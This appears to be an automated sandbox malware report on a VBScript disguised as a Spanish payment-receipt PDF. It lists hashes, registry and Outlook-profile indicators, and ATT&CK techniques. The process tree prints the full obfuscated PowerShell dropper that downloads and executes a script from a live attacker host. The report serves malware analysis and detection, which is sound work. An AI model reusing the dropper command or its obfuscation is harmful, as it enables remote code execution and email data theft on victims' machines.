051bc8ae84b32374b0b3372aecb972f2b41a8626e302ea18e6178933ecfecb22

General

Target

JUSTIFICANTE DE PAGO,pdf.vbs
Size

722B
MD5

04e47e5f5b9f59e48c54939992252fd9
SHA1

5b3d989972677faf61eb5aadb194fc441a93a1ab
SHA256

051bc8ae84b32374b0b3372aecb972f2b41a8626e302ea18e6178933ecfecb22
SHA512

08c7de2e1530551a3b32c4d88ce56f1d4031c7f05d8e5bfd0de1d5d8edaada46f9d1b8dc89beeb58a29710b579c4732dfb400fc6ccb36e838335188b60ab93f8

Score

10^/10

collection

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://khghfsaguvtyrioukjhgfydfgbhnyjhbgvdcertrtbgnhhbjctryvbgnhmihgyr.ydns.eu/qazxswedcvfrtgbnhyujm/waswaswaswa.ps1

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
6	1240	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	powershell.exe
Key opened	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	powershell.exe
Key opened	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1240	powershell.exe
1240	powershell.exe
1240	powershell.exe
1240	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1240	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 5056 wrote to memory of 1240	5056	WScript.exe	83
PID 5056 wrote to memory of 1240	5056	WScript.exe	83
PID 1240 wrote to memory of 4216	1240	powershell.exe	85
PID 1240 wrote to memory of 4216	1240	powershell.exe	85
PID 4216 wrote to memory of 2688	4216	csc.exe	86
PID 4216 wrote to memory of 2688	4216	csc.exe	86

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	powershell.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\JUSTIFICANTE DE PAGO,pdf.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5056
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec ByPaSs -C i`Ex(nE`w-OBj`ecT ('N'+'et.Webcl'+'ie'+'nt')).('Do'+'wn'+'loadStri'+'ng').Invoke('http://khghfsaguvtyrioukjhgfydfgbhnyjhbgvdcertrtbgnhhbjctryvbgnhmihgyr.ydns.eu/qazxswedcvfrtgbnhyujm/waswaswaswa.ps1')
  2⤵
  - Blocklisted process makes network request
  - Accesses Microsoft Outlook profiles
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - outlook_office_path
  - outlook_win_path
  PID:1240
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kwphdza2\kwphdza2.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4216
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES94E2.tmp" "c:\Users\Admin\AppData\Local\Temp\kwphdza2\CSCFDB21F685E3349799A4078AE2D90B4A5.TMP"
      4⤵
      PID:2688

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Email Collection

1

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES94E2.tmp

Filesize
1KB

MD5
ff8eea256072c341bc337d11cd6460ff

SHA1
9ad340850b6f0d078a91ae2f2fd059e2b99195da

SHA256
1712f355d1e3e35c075b0f07bab75371f0556a24231e7512a68f3c7d23154c2f

SHA512
1f5d0eb071381879535df6708c23bba875c1d2f140e46dc216ede5a551e4d1993a7ce625863451a8f8de4492bf18686ede976f223f5cb95476d3cea697b79eee

Download Submit
C:\Users\Admin\AppData\Local\Temp\kwphdza2\kwphdza2.dll

Filesize
5KB

MD5
38105267447d0bc65c5f99f3ba4abb3c

SHA1
6a8eecd1b7f69a9109e0bd1e23fc6be9c07d32a7

SHA256
9ef62b9e3eca08fbfbd63fc0ebfa92109ee7b36c49177de5f15f98444f5d59b3

SHA512
e5c29614f9eba01f4c99669bb5b3915246112d19271790116231e850afd774cd13eec8f792bfb36e756d9e0e7a0068d46d07e4ddba01ec76375e0ce247943cae

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kwphdza2\CSCFDB21F685E3349799A4078AE2D90B4A5.TMP

Filesize
652B

MD5
aaad3582a9ca2855fb3569e9b0cf8bc9

SHA1
aae9c09c3b0fb96496267f9aa77a847daae33e2a

SHA256
385de8a127b677773bbe8b9c9fb6fa15bbb15c51bc7722628394d8d484ad57df

SHA512
58dd3f24acb44f69733027f7676a59c8c798c299e8bebfb9070cf61e56f26ad286050f1f92a0bcb68f9ce237004bf8b74a0c908943f5e611791d156b59a17ccd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kwphdza2\kwphdza2.0.cs

Filesize
1KB

MD5
2d821e64622bd1c7e8d9cbd7906d7e93

SHA1
44ce279eee1ac333c09cee731432dbd79fd735a7

SHA256
95690250100bb794cb88e93bcbf58994745ed7985f7370146ecf4b78514813ac

SHA512
82d0741913eb7ac945008a613bb5e11047db3b20a3bfbc6d50b7ef6350965854d7f8576998012000f8661df149f67e38123269bc352bcc72488a5988afd17980

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kwphdza2\kwphdza2.cmdline

Filesize
369B

MD5
8c8b4c7585dc7240b5aa141ededee740

SHA1
4d864b4949efdfea19b6aa7ae63aab53382813b8

SHA256
9f4ca4509b1478e9e062bc2640ce46f5f1130a96af7763f64cb38975d24e9a9b

SHA512
07f3d189a045ffa6733b4ae810acd7218b4669b8bfb8573017151b5cfdcf8b7b4f97deaa47d77404d42762f0fc7d778688a9d69365c4fc01b177bb01f72601e4

Download Submit
memory/1240-132-0x0000000000000000-mapping.dmp

Download
memory/1240-133-0x00000191BBA50000-0x00000191BBA72000-memory.dmp

Filesize
136KB

Download
memory/1240-134-0x00007FFF7B8F0000-0x00007FFF7C3B1000-memory.dmp

Filesize
10.8MB

Download
memory/1240-142-0x00000191D5B40000-0x00000191D5B90000-memory.dmp

Filesize
320KB

Download
memory/1240-143-0x00007FFF7B8F0000-0x00007FFF7C3B1000-memory.dmp

Filesize
10.8MB

Download
memory/2688-138-0x0000000000000000-mapping.dmp

Download
memory/4216-135-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing